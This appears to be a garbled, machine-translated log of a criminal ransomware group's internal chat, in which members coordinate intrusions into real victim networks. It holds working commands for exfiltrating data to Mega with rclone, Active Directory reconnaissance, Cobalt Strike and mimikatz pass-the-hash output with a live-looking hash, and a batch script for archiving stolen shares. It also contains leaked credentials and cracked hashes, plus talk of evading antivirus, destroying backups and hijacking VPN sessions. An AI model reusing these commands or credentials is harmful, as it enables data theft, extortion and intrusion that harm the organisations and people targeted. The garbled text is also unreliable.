2. Encoding...(enter into console (>> btoa ("47ZjFKx24Nj2h2UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeDI0TmoyaDBVdFpLWDWDJPWW5aTGdSZZA1YVgyU3Vhb3RWenJRZz0=") with the replacement of the session and all?)@all Friends, the amount of shared experience exceeds the normal and structured storage, it was decided to raise a simple forum engine to publish there relevant guides and materials that we all have in the process.
A big request to everyone! At your leisure time - write to me to register, and after her - write there on the articles of some, on the subject of the LJ to decide who can what.
This forum will not be used as a chat-room, more as a storage and replenishment of the knowledge base, it will be useful to all, I have tried to divide the navigation of the topics and the approximate titles of the first articles outlined where we will port the material.
Take responsibility, you have no idea how many questions of the same type are asked of each other here every day! We can save a lot of time for ourselves and our colleagues! https://prnt.sc/yz4t49с March 3, he writes 55 backups every timehttp://prnt.sc/yz4fgi
this shit goes to the cloud? they also seem to be able to restore within 30 days no? should i look for an account or give up? @all who needs to rescan sonics - write within the hour to the relevant chatsIf the corp. google restores the deletion lust 30 days it's like if you take down gdrive, then all with endsIn my case i have a synology nas, it has claud sync to google drive, what options for deletion ? and does google restore deleted drive files ? @all can someone pass the session from the x64 car ? @all friends who are there free and without tasks, beep in PM I bet)toulouse by the way handy))) and not cna at all, does not integrate directly with the coba is it a script ?) https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
you mean this script?)hello everyone, who knows a cna script with these arguments?
>psexec [hostname] [share] [listener]@all write to anyone who needs a session to redo, right in the workplace on this case where you need freshThe question as above advised through ftp server on the dedicec, filezilla put 5 minutes, then through the clone pull, very surprised speed, 46 gb for an hour and a half did[ ] (https://stylebrooks.com/group/general?msg=5KZsucuYmrv24D8TX) found a version of this. if relevant scribble
5-10mbps really.
onyon back repurposed kekhoroshy analogue) I just rented a server at 32tb and there I download by ftpstalked that the case is limited to the use of mega, are there any other good analogues, preferably with btk payment ?yes, it will take some time to weigh all the same, won't it ?well thank you and that's it) you can somehow use wmik, the syntax would be correct da well, it's too long...see in the last line of the outaptu ``dir /s E:\YouDocs > log.txt
``How do I check the size of a certain folder?
dnscmd /enumzones > AllZones.txt
for /f %a in (AllZones.txt) do dnscmd /ZoneExport %a %a.txt
` `remember plyz command polling DNS with DC@all who needs 2fa re-transcribe to sonics? now really do if the log will not be then try the user to write it, from whom you start vmikflag -P plug in and add at the end >> C:\stat.logI was just interested in the statistics.
In any case, thank you.@lexman wait, but it's just start and check, without the ability to periodically see the statistics of the upload, as with the flag `-P`, right? I will add, before starting check that the system rights on the remote machine was enough to go to a given diRight, thanks.
The variant with wmic is also interesting, @lexmandaThe whole output will go into session, yes? `shell rclone.exe copy "\\host\F$" mega:/ -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12 -P `all output into session. flag `-P `you use and all or ` --progress `Thanks! Yes I will explain in detail, please, or give example?
Perhaps others will also be useful.rklon command put in the baton, run through wmic
it worksGentlemen, is there any way to run rclone from bacon, and then periodically check the progress? https://www1.appliedsystems.com/en-us/resources/videos/applied-csr24/https://portal.csr24.com/ - has anyone come across? stewart can fill a bunch at once a free service for cracking hasheshttp://crackstation.net/sends backups to the cloud, in the account is a pass, but is there an option to get it? as in viamStorageCraft who decrypted the cracks?
SHUT UP AND TAKE ME FULL INFO!111 and 50 rows by 50 rows to query the tablesto watch the database then dump the clere pass will query all the msl servakina based noSpaaahohoro we need the combine to pump up not the fact that there is a webapp, or separately look for this webapp not clere dumps hashioni lie in clereveb the appa "writes" in the base in config[ ](https://stylebrooks.com/group/general?msg=eJuSrgKkk8W7Yumcy) hmmm
well if it's on gitecac i've already said it's a tricky way to do it
more options? yes, where is the target process on the DB server? where are the creeds? msf can dump sa creeds, i think there is a similar solution on the gitaskl management studio involves opening an rd on which you can palp
cobalt session - to catch a detec-tionadoado the easiest and safest option that do not palnutsya usually these crosses are in the configuration of web applicationswant to pump the manual can and not only her pollingI ask why is it MsSql admin account is certainly she has a crosses or what is where as the account is where to get it?so stopsqlcmd under the VPN)hhm on a remote hosta from under the VPN saysqlcmd under the account saaWhat options for polling the database has except
SQL Management Studio
hoisting the session and the injection in sqlservr ?@all those without cases - in pm+@all attention everyone, who needs to reset the session SonicWall have to work with today directly - write to the PM thank you I will try it thank youhttp://habr.com/ru/post/441166/
https://www.ise.io/casestudies/password-manager-hacking/кто can do something with the 1Password database?
foreach($line in Get-Content .\file.txt) {
if($line -match $regex){
# Work here
}
}
``in the loop, for examplepowershell Get-WmiObject -Class win32_logicalDisk `-ComputerName IP ` | ft DeviceID, @{Name="Free Disk Space (GB)";e={$_.FreeSpace /1GB}}, @{Name="Total Disk Size (GB)";e={$_.Size /1GB}} -AutoSize
Can someone tell me how to specify the ip address file correctly, so I don't have to type them separated by commas?
tried : `(Get-Content C:\programdata\list.txt)` but it says it's wrong argument
output:
```
#< CLIXML
Get-WmiObject : Cannot validate argument on parameter 'ComputerName'. The argum_x000D__x000A_ent is null or empty. Provide an argument that is not null or empty, and then t_x000D__x000A_ry the command again._x000D__x000A_At line:1 char:54_x000D__x000A_+ Get-WmiObject -Class win32_logicaldisk -ComputerName (Get-Content c:\programd_x000D__x000A_ata ..._x000D__x000A_+ ~~~~~~~~~~~~~~~~~~~~~~~~_x000D__x000A_~~~_x000D__x000A_ + CategoryInfo : InvalidData: (:) [Get-WmiObject], ParameterBindi _x000D__x000A_ ngValidationException_x000D__x000A_ + FullyQualifiedErrorId : ParameterArgumentValidationError,Microsoft.Power _x000D__x000A_ Shell.Commands.GetWmiObjectCommand_x000D__x000A_ _x000D__x000A_
``[ ](https://stylebrooks.com/group/general?msg=S6Z34gLYgcgAwB5Hx) anybody rolled ? let me play :)thxxm ``
adfind.exe -b dc=domain,dc=local -f "(objectcategory=person)" > C:\Programdata\ad\domain\ad_users.txt
adfind.exe -b dc=domain,dc=local -f "objectcategory=computer" > C:\Programdata\ad\domain\ad_computers.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=organizationalUnit)" > C:\Programdata\ad\domain\ad_ous.txt
adfind.exe -b dc=domain,dc=local -subnets -f (objectCategory=subnet)> C:\Programdata\ad\domain\subnets.txt
adfind.exe -b dc=domain,dc=local -f "(objectcategory=group)" > C:\Programdata\ad\domain\ad_group.txt
adfind.exe -b dc=domain,dc=local -gcb -sc trustdmp > C:\Programdata\ad\domain\trustdmp.txt
``trustanddmp ``nltest /trusted_domains ``remember the command to poll the trustdmp ? without a crude can be? from yes to one@alter what is the manual to hunt and drag terrabytes!
it's through the S3 repository implemented? o_unreal, alas, there's a battlefield here, who's rocket is cooler - and he wins, so we build rockets constantly)so it's not scary anymore)we have everything here and need constant support)through any channel of any software in theory, there are different ways to play in principle we have someone who writes
put the tz - let's make a simplea it's perl-likehttp://github.com/RhinoSecurityLabs/external_c2_frameworkhttps://www.cobaltstrike.com/help-externalc2https://rhinosecuritylabs.com/aws/hiding-cloudcobalt-strike-beacon-c2-using-amazon-apis/не, you do not understand a little
now show the detects well I still do not have time to figure it out - if you have the desire - better to dig in this direction then http://github.com/Und3rf10w/external_c2_framework
like this, but if you are interested - cobalt has external c2 and tacda, a complete framework@all
https://blog.dylan.codes/shad0w/
interesting enough "fresh" framework
if you have time and interest - i recommend to poke around, but viola correctly hinted that you can put the client on the remote with the VPN just[ ](https://stylebrooks.com/group/general?msg=H5q2v6pjgFTsWTMPQ) if you have crones, it's hard to answer, but i do not really understand why you need sox in this chain? why not open a VPN immediately with the right part?maybe there is some ssh access, where you can clean up with commands.i at least have not seen a two-factor on vmik or psehs try through wmiexec shell open and forti process put out if there Hyper-V by mikrosoft at least if you put out the hypervisor but you and all the virtuals it hosts will fall off, no? but let's know
sansp. no time. admin put out the internets on it kerberos tickets for example can be requested to get rights to shared resources this hash machine for SPN you after pth should do stiltoken this process :
```
| PID 17844
| TID 8412
| LSA Process is now R/W
```
which runs under the token you hackypants well if it is a live machine acct should work ... you can also try through the laughs, also should work
cme smb 127.0.0.1 -u TRUCAMTLBK4\$ -H c028fc26ba545c599adbb9b7e26964d1 -d trudeaucorp.como very defensible bekapseven in the brow here admin me worked 100% lm there whatev msf lm:ntlm suyumimik eats ntlm straight to kobena it is clear) lm:ntlmane?ntlm simpler sorta śhatakoy should be ntlmc028fc26ba545c599adbb9b7e26964d1:c028fc26ba545c599adbb9b7e26964d1msfom then all bypass everything try - /user:TRUCAMTLBK4\$.salt is what but I may not mimic the correct way ``
beacon> mimikatz sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:TRUCAMTLBK4$ /domain:trudeaucorp.com /ntlm:c028fc26ba545c599adbb9b7e26964d1 command
[+] host called home, sent: 750703 bytes
[+] received output:
user : TRUCAMTLBK4$
domain : trudeaucorp.com
program : cmd.exe
impers. : no
NTLM : c028fc26ba545c599adbb9b7e26964d1
| PID 17844
| TID 8412
| LSA Process is now R/W
| LUID 1 ; 2572284471 (00000001:9951f237)
\_ msv1_0 - data copy @ 000001CC19EF7DD0 : OK !
\kerberos - data copy @ 000001CC1A834828
\_ aes256_hmac -> null
\_ aes128_hmac -> null
\_ rc4_hmac_nt OK
\_ rc4_hmac_old OK
\_ rc4_md4 OK
\_ rc4_hmac_nt_exp OK
\_ rc4_hmac_old_exp OK
\_ *Password replace @ 000001CC17DA3948 (32) -> null
beacon> shell dir \\\TRUCAMTLBK4\c$
[*] Tasked beacon to run: dir \\\TRUCAMTLBK4\c$
[+] host called home, sent: 51 bytes
[+] received output:
You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.
``And the ptx how? So give me the hash of the machine and the login in TRUCAMTLBK4\$ format, you can safely stick it into the msf.
admin is very clever about hiding backups.
urgentonasar
have a domain
need access to the machine
will this work and how to get it right
We'll have to dump all the hashes
and try to authenticate with the machine hash
Target is TRUCAMTLBK4
hash
the output is
``9051 TRUCAMTLBK4$ c028fc26ba545c599adbb9b7e26964d1 528384
```
how do you shoehorn a hash \ token to start a machine? command\session at least my@all issproduce.co.uk remind me who has a mesh in work small etaschas look at what their data on the deed will press possible if the bookmark is or can create it fuckin coding thank you understandChoose from the tune of the admin? different if there remot app you must have the servers configuredHello guys all! Hey guys, advise Sonic, from the browser can fall in the RDP without a VPN connection?[ ](https://stylebrooks.com/group/discussion?msg=WmcxwRiXwBd3iiNFN) #general[ ](https://stylebrooks.com/group/discussion?msg=GpNTAMdKuF2W7ZctF) hmm, timeweaver also supports it? interesting ... someone posted how then you can pull sessions from vpn sonic software, no tips where it is? did not work to install as admin. had to install timeweaver host, then there is a separate idd to enter via lockscreen[ ](https://stylebrooks.com/group/discussion?msg=36KHjDQw4k6Tp5CwX) set
always with the enidisk you can turn on the tunnel to 3389 to your host and connect to localhost:3389People, how do I make timka or enidisk not cut off when leaving the rdpone, thank youSomething you can create, sometimes not
Not all polzak have bookmarks by default, here @Code was chekker cookies, try to rewrite and other polzak will be bookmarks or possibility to createprivet, you can try to create a webrp link yourself if there is such info from available Downloads | Options | Help | LogoutHello, advise please
SonicWall through the cookie, got access to the portal, but I do not see a link to webrdpok, thanks, alter asked to write to who is free timlid, I do not do anything yetATXGrimnir on the 2016 server dllka ran, everything okhtrs://dyncheck.com/scan/id/0e85df67f128617619f46255d62b1a1e
1/23
AhnLab V3 Light of some kind is giving dynamite detection checked on dyncheck dll x64 on 2008 crashes eheCodeocta0dayinbizhttps://dyncheck.com/scan/id/5b13716a94a301b0faef2dd60ef09b07#collapse_infoокточки input for dll
```
DllRegisterServer
DllInstall
DllUnregisterServer
Control_RunDLL
``@all working update
I think I need to test it on vin 10 and fix it on 7, same story on 12, same story with both folders tested on 2016 server x64 without AB
i also noticed the size of the dll itself increased 4 times compared to the dlls from the previous artifact
x64 as well as x86 is much better than previous artifact
360 Total Security Essential crashesChuсkWho had a normal update? @all update artifact whale, please test on dincek without internetnimbus2000 since there will not be a second onethere is no need to write here
gentlemen #teamleaders let those who understand poorly the first time understand @all gentlemen, friends and colleagues
I'm sick and tired of being a fucking babysitter for everyone
there is a very detailed report and the result of the downloaded data which WE all need for the trades to get the most out of the work
the next group that will ignore it will choose a responsible person who will be punished with a ruble or permanently excluded from the work process, everyone has a nerve - I have a lot, but I also have a limit of certain
I do not understand can not be inserted back or what? only by hand can be inserted? https://prnt.sc/106bra1кто with tapes strong? I can not erase tapes, mediawalt full, but I understand they are not in the drive, and they can not erase[ ](https://stylebrooks.com/group/discussion?msg=WiG3JRn38X4sLa6Lo) in Burp sox can exhibitGods, anyone Burp for proxy used? All happy holiday! Happy Holidays men! ahaha Happy Holiday ALL !!!)))Not lifted the right - not a man! =) Reciprocally) Happy Holidays, men! Happy Holidays, men! :) anyone decrypted the base mssql? Shusk Who has a normal left? @all update artifact of the whale, please test it on dincek without internetnimbus2000elefantkalinka interesting thing to look at
```
https://github.com/apenwarr/sshuttle
i will check it, thank you if you find it - put rukanin's ipi into the VPN adapter and you can tell the subdomains
there will be something like dns.companyname.com the corporation may have its own public dns server, google anything there ``Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\Administrator>ipconfig /all
Windows IP Configuration
Host Name ... ... ... : hub1
Primary Dns Suffix ... . :
Node Type . . . . . ♪ Hybrid ♪
IP Routing Enabled. . . . No.
WINS Proxy Enabled. .: No
Ethernet adapter Ethernet 4:
Connection-specific DNS Suffix :
Description . . . . . . : Fortinet SSL VPN Virtual Ethernet Adapter
Physical Address. . . . . : 00-09-0F-AA-00-01
DHCP Enabled . . . . ♪ No ♪
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address . : fe80::19f3:f0f:c790:dc10%18(Preferred)
IPv4 Address . . . . .: 10.212.134.200(Preferred)
Subnet Mask . . . . : 255.255.255.255
Default Gateway . . . . :
DHCPv6 IAID . . . . . : 553650447
DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
DNS Servers ... ... ... : 8.8.8.8
8.8.4.4
NetBIOS over Tcpip. ♪ Enabled ♪
Ethernet adapter Ethernet 3:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . .: Fortinet Virtual Ethernet Adapter (NDIS 6
.30)
Physical Address. . . . .: 00-09-0F-FE-00-01
DHCP Enabled. . . . ♪ Yes ♪
Autoconfiguration Enabled . .: Yes
Ethernet adapter Ethernet 2:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . . ♪ Intel(R) PRO/1000 PM Network Connection ♪
Physical Address . . . . : 00-23-8B-CE-5F-E3
DHCP Enabled. . . . ♪ Yes ♪
Autoconfiguration Enabled. .: Yes
Ethernet adapter Ethernet:
Connection-specific DNS Suffix :
Description . . . . . . . : Intel(R) 82566DM-2 Gigabit Network Connec
tion
Physical Address: . . . .: 00-23-8B-CE-5F-E2
DHCP Enabled. . . . .: No
Autoconfiguration Enabled . .: Yes
Link-local IPv6 Address . : fe80::3852:1640:6cf4:bd25%12(Preferred)
IPv4 Address . . . . : 23.92.208.98(Preferred)
Subnet Mask . . . . : 255.255.255.252
Default Gateway . . . . : 23.92.208.97
DHCPv6 IAID . . . . : 301998987
DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
DNS Servers ... ... ... : 8.8.8.8
8.8.4.4
NetBIOS over Tcpip. ♪ Enabled ♪
Tunnel adapter isatap.{6A8A2F53-F893-4F8E-B941-CB9F7FF92A02}:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . ♪ Microsoft ISATAP Adapter ♪
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . .: Yes
Tunnel adapter 6TO4 Adapter:
Connection-specific DNS Suffix :
Description . . . . . . : Microsoft 6to4 Adapter
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . . .: Yes
IPv6 Address. . . . : 2002:175c:d062::175c:d062(Preferred)
Default Gateway . . . . : 2002:c058:6301::1
2002:c058:6301::c058:6301
DHCPv6 IAID . . . . . : 452984832
DHCPv6 Client DUID . . . . : 00-01-00-01-27-E5-A9-A0-00-23-8B-CE-5F-E2
DNS Servers ... ... ... : 8.8.8.8
8.8.4.4
NetBIOS over Tcpip. ♪ Disabled ♪
Tunnel adapter isatap.{6260C4BD-FC56-488A-BF39-743C46AE9648}:
Media state ... ... ... ♪ Media disconnected ♪
Connection-specific DNS Suffix :
Description . . . . . ♪ Microsoft ISATAP Adapter #2 ♪
Physical Address . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled . . . . .: No
Autoconfiguration Enabled . . .: Yes
C:\Users\Administrator>route /print
Manipulates network routing tables.
ROUTE [-f] [-p] [-4|-6] command [destination]
[MASK netmask] [gateway] [METRIC metric] [IF interface]
-f Clears the routing tables of all gateway entries. If this is
used in conjunction with one of the commands, the tables are
cleared prior to running the command.
-p When used with the ADD command, makes a route persistent across
boots of the system. By default, routes are not preserved
when the system is restarted. Ignored for all other commands,
which always affect the appropriate persistent routes.
-4 Force using IPv4.
-6 Force using IPv6.
command One of these:
PRINT Prints a route
ADD Adds a route
DELETE Deletes a route
CHANGE Modifies an existing route
destination Specifies the host.
MASK Specifies that the next parameter is the 'netmask' value.
netmask Specifies a subnet mask value for this route entry.
If not specified, it defaults to 255.255.255.255.
gateway Specifies the gateway.
interface the interface number for the specified route.
METRIC specifies the metric, ie. cost for the destination.
All symbolic names used for destination are looked up in the network database
file NETWORKS. The symbolic names for gateway are looked up in the host name
database file HOSTS.
If the command is PRINT or DELETE. Destination or gateway can be a wildcard,
(wildcard is specified as a star '*'), or the gateway argument may be omitted.
If Dest contains a * or ?, it is treated as a shell pattern, and only
matching destination routes are printed. The '*' matches any string,
and '?' matches any one char. Examples: 157.*.1, 157.*, 127.*, *224*.
Pattern match is only allowed in PRINT command.
Diagnostic Notes:
Invalid MASK generates an error, that is when (DEST & MASK) != DEST.
Example> route ADD 157.0.0.0 MASK 155.0.0.0 157.55.80.1 IF 1
The route addition failed: The specified mask parameter is invalid.
(Destination & Mask) != Destination.
Examples:
> route PRINT
> route PRINT -4
> route PRINT -6
> route PRINT 157* .... Only prints those matching 157*
> route ADD 157.0.0.0 MASK 255.0.0.0 157.55.80.1 METRIC 3 IF 2
destination^ ^mask ^gateway metric^ ^
Interface^
If IF is not given, it tries to find the best interface for a given
gateway.
> route ADD 3ffe::/32 3ffe::1
> route CHANGE 157.0.0.0 MASK 255.0.0.0 157.55.80.5 METRIC 2 IF 2
CHANGE is used to modify gateway and/or metric only.
> route DELETE 157.0.0.0
> route DELETE 3ffe::/32
C:\Users\Administrator>route print
===========================================================================
Interface List
18...00 09 0f aa 00 01 ......Fortinet SSL VPN Virtual Ethernet Adapter
17...00 09 0f fe 00 01 ......Fortinet Virtual Ethernet Adapter (NDIS 6.30)
13...00 23 8b ce 5f e3 ......Intel(R) PRO/1000 PM Network Connection
12...00 23 8b ce 5f e2 ......Intel(R) 82566DM-2 Gigabit Network Connection
1...........................Software Loopback Interface 1
14...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
15...00 00 00 00 00 00 e0 Microsoft 6to4 Adapter
45...00 00 00 00 00 00 e0 Microsoft ISATAP Adapter #2
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 23.92.208.97 23.92.208.98 40
10.212.134.200 255.255.255.255 On-link 10.212.134.200 257
23.92.208.96 255.255.255.255.252 On-link 23.92.208.98 276
23.92.208.98 255.255.255.255.255 On-link 23.92.208.98 276
23.92.208.99 255.255.255.255.255 On-link 23.92.208.98 276
127.0.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255.255 On-link 127.0.0.1 306
127.255.255.255.255.255.255.255 On-link 127.0.0.1 306
192.168.1.0 255.255.255.0 10.212.134.201 10.212.134.200 1
199.192.183.66 255.255.255.255 23.92.208.97 23.92.208.98 20
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0.0 240.0.0.0 On-link 23.92.208.98 276
224.0.0.0.0 240.0.0.0 On-link 10.212.134.200 257
255.255.255.255.255.255.255.255 On-link 127.0.0.1 306
255.255.255.255.255.255.255.255 On-link 23.92.208.98 276
255.255.255.255.255.255.255.255.255 On-link 10.212.134.200 257
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 23.92.208.97 20
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
15 1026 ::/0 2002:c058:6301::1
15 1041 ::/0 2002:c058:6301::c058:6301
1 306 ::1/128 On-link
15 1010 2002::/16 On-link
15 266 2002:175c:d062::175c:d062/128
On-link
12 276 fe80::/64 On-link
18 261 fe80::/64 On-link
18 261 fe80::19f3:f0f:c790:dc10/128
On-link
12,276 fe80::3852:1640:6cf4:bd25/128
On-link
1 306 ff00::/8 On-link
12 276 ff00::/8 On-link
18,261 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
C:\Users\Administrator>
``ipconfig /all local subnets or what? What to scan? Men, who has any ideas?[ ](https://stylebrooks.com/group/general?msg=6hvXr8S7ES64vC8qH) on the git in the manual says it could be easier
python -m pip install
but easier could be
python -m pip install impacket from the downloaded release folder, not the master branch
It may complain next that there is no readline module
pip install pyreadline
and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing)
it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windowsимпакет not install what you have a problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chachhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? or can anyone have a chance to quickly remove the information? at least in the logs of the backups Job done there in the logs should be visible address of the panel try to turn on the log of network connectionsGod, good day all.
Perhaps someone has experienced something similar, will be able to suggest something.
All servers in the network have a folder `C:\ProgramData\Veeam\Backup`, where daily log files such as `VeeamGuestHelper_13082021.log` are stored, but I can not find the veeam anywhere.
i advise to set it to 5, with 9 it may take a long fucking time to compress.
plus add the password to the archive as an argument, it will be fucked upYou guys, I want to share with you a useful batch file, it runs through the sphere and adds the files suitable for the date condition + creates a file with a listing of archived files and adds it to the archive, you specify your info for work:
share - path to the balloon
z7a - path to the console 7zip exeştion.
archive - path and name of the future archive
mindate - minimum date of the file for archiving
diskword - the letter to mount the balloon fs (must be free)
compres - compression level.
*For the batch file to work, the Temp folder must be in C:\ProgramData\Temp)
**Paths to the archiver and to the archive to be created must be without spaces
***Leave all quotation marks in their place.)
save it as share.bat upload it to the server and run it through shell share.bat
Minimal automation for those who drag the data =)
```
set share="\\COMPUTER.domain.com\ShareName"
set z7a=C:\ProgramData\Temp\7za.exe
set archive=C:\ProgramData\Temp\NameOfNewArchive.7za
set mindate=+01/01/2020
set diskword=L:
set compres=-mx9
net use %diskword% %share%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (\"%z7a%\" a %compres% \"%archive%\" @path)" /D %mindate%
forfiles /P %diskword%\ /S /C "cmd /c if @isdir==FALSE (echo @path >> C:\ProgramData\Temp\full_listing.txt)" /D %mindate%
"%z7a%" a %compres% "%archive%" C:\ProgramData\Temp\full_listing.txt
del C:\ProgramData\Temp\full_listing.txt
net use * /delete /y
``try``
Lucy:Sandoval:lev.menche.dochilov@list.ru:43BNbN97t1:O586wuQt
Paula:White:maks.korelov.87@bk.ru:nsR2Zdtx7x:49Jxo7A4
Jennifer:Foster:vesta.verenikina.90@mail.ru:99zjZ0F2Ow:CmynWwK2f
``To see info about majors in the company don't anyone have aka linkdin?
https://github.com/RythmStick/AMSITrigger
```
If anyone needs it on pshMail Sniper is a penetration testing tool to search for certain terms (passwords, insider information, network architecture information, etc) in the Microsoft Exchange environment via e-mail. It can be used either by a non-administrative user to search their own email, or by an Exchange administrator to search each user's mailbox in the domain.https://github.com/dafthack/MailSniper
https://9ba3de57-a-7faedcf5-s-sites.googlegroups.com/a/dafthack.com/dafthack/files/MailSniper-Field-Manual.pdf?attachauth=ANoY7cqDYNjE450gUhLsz7fxOdURq-1NQLB1FQibqTfEFG1SgQuMACmqcMxG42wtlOu1m3rLkQ1WfTR95mv1TilYvRskUwTtgS8qrjUWvzVjb-3PLYinJy0yI9qmLw_f2dbzktbxyOCCTQTSEwubyxtD24HLIgTmsTONnKKc6OTBMY92xZo5Uyai_bhojd5j9dNp3cznrSCNysokMUnmyOM30ulPi8pmEBBJC50vsghmgzzTvmWXQ24%3D&attredirects=0у i'm fine last night re-launched is everyone's chat is glitchy today? @steven ay thanks uncle !
8a62184e246b79c307a84ab75de6083b:Zgmegcgb1973201
``Thank you broda hi@steven hello uncle. Can you help) ?
```8a62184e246b79c307a84ab75de6083b
``Does anyone have a multidomain case in the works and can shoot me a session from there?
it's fucking software.
with the fucked-up owners
and adverts 12 year olds made by some schoolboy what safe mods
stop reading all that revilian bullshit in safemode with command line support as i remember nothing can run except regular services in 10ka didn't check it is not true?i thought that in safemode aver is not started and you can kick it out by literally deleting the entire folderwhen you have access to kvm or the sphere, then yes, but as for sure not Komilfors F1 _) the server may just not come out of reboot, that's all there like in safemode user should enterthe clumsy method of bypassing avran through safemode)))) ``DTrump4ever
``what's so cool? https://xakep.ru/2021/04/08/dtrump4ever/
very cool, very! what exactly it grabs - shortcut or damag files should be tested careful with sofos, already in the second network grabs a lock like this:
machine without av - #1, from it we run the locker with the flak -p \\$machine #2\c$
and on the machine #2 where there is sofos, it pals it and does not allow to prolotatomsarmhasherpiperperry can read from the running processNot .ost archive with mail weighing gigabytes, but just a config\manipulation to open the outlook on a virtual machine and the mail is fresh loaded and could read it Is the outlook has a Linux analogue of the cookie? To steal some config to myself and read the mail
to not bother with chrome cookies \not to run into 2fa in the mailb*and in the spam filter mnu try to go to the mail see you can try to change the username, but then also the notification may comepochtimely yes I do not know clean it fits under the aforementioned, well then almost certainly will send
google what alerts there are in general there are errores/notificationssmtp and who to send it to and is it tied directly to the ovner's email?there are no alerts there, they are connected to the mailbox of the ovner? maybe someone had a problem with it, so try to avoid catching an alert. I haven't worked with this kind of thing, but I've seen HPE tapes a few times, the cassettes are cleared through the drivers Googling drivers for a couple dozen cassettes who worked with this thing?
Immediately after logging into a VPN and raising / session + backdoor already in the 3-4th case dropped out for good.
Do you have any explanation for this? As if there on the admin sonic straight alerts and then even a bonus cut off the VPN intentionally@all write to the confines where you need to reset the session for a sonic who needs to, if someone needs a locker or a new case - similarnovshe Hi :v: maybe someone has run into this problem with java? or tell me. did first by manu
```
https://www.linuxuprising.com/2020/09/how-to-install-oracle-java-15-on-ubuntu.html
```
The ppa repository didn't create it. Then i tried it.
```
sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list
sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
sudo apt-get update
sudo apt-get install oracle-java15-installer
sudo apt install oracle-java15-set-default
```
out like this
```
root@kali:~# sudo echo "deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main" | sudo tee /etc/apt/sources.list.d/linuxuprising-java.list
deb http://ppa.launchpad.net/linuxuprising/java/ubuntu focal main
root@kali:~# sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
Executing: /tmp/apt-key-gpghome.aOn8uUjdxO/gpg.1.sh --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 73C3DB2A
gpg: key EA8CACC073C3DB2A: "Launchpad PPA for Linux Uprising" not changed
gpg: Total number processed: 1
gpg: unchanged: 1
root@kali:~# sudo apt-get update
Hit:1 http://deb.anydesk.com all InRelease
Ign:2 http://ftp.debian.org/debian jessie-backports InRelease
Hit:3 http://downloads.metasploit.com/data/releases/metasploit-framework/apt lucid InRelease
Get:4 http://ftp.debian.org/debian stretch-backports InRelease [91.8 kB]
Hit:5 http://packages.microsoft.com/repos/vscode stable InRelease
Hit:6 http://ppa.launchpad.net/linuxuprising/java/ubuntu focal InRelease
Err:9 http://ftp.debian.org/debian jessie-backports Release
404 Not Found [IP: 151.101.134.132 80]
Hit:7 http://ftp1.nluug.nl/os/Linux/distr/kali kali-rolling InRelease
Hit:10 http://linux.teamviewer.com/deb stable InRelease
Reading package lists... Done
E: The repository 'http://ftp.debian.org/debian jessie-backports Release' does not have a Release file.
N: Updating from such a repository can't be done securely, and is therefore disabled by default.
N: See apt-secure(8) manpage for repository creation and user configuration details.
root@kali:~# sudo apt-get install oracle-java15-installer
Reading package lists... Done
Building dependency tree
Reading state information... Done
oracle-java15-installer is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# sudo apt install oracle-java15-set-default
Reading package lists... Done
Building dependency tree
Reading state information... Done
oracle-java15-set-default is already the newest version (15.0.2-1~linuxuprising0).
0 upgraded, 0 newly installed, 0 to remove and 2143 not upgraded.
root@kali:~# java -version
java version "15.0.2" 2021-01-19
Java(TM) SE Runtime Environment (build 15.0.2+7-27)
Java HotSpot(TM) 64-Bit Server VM (build 15.0.2+7-27, mixed mode, sharing)
root@kali:~#
```
```
root@kali:~/Cobalt42_v2# ./cobaltstrike
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
```
```
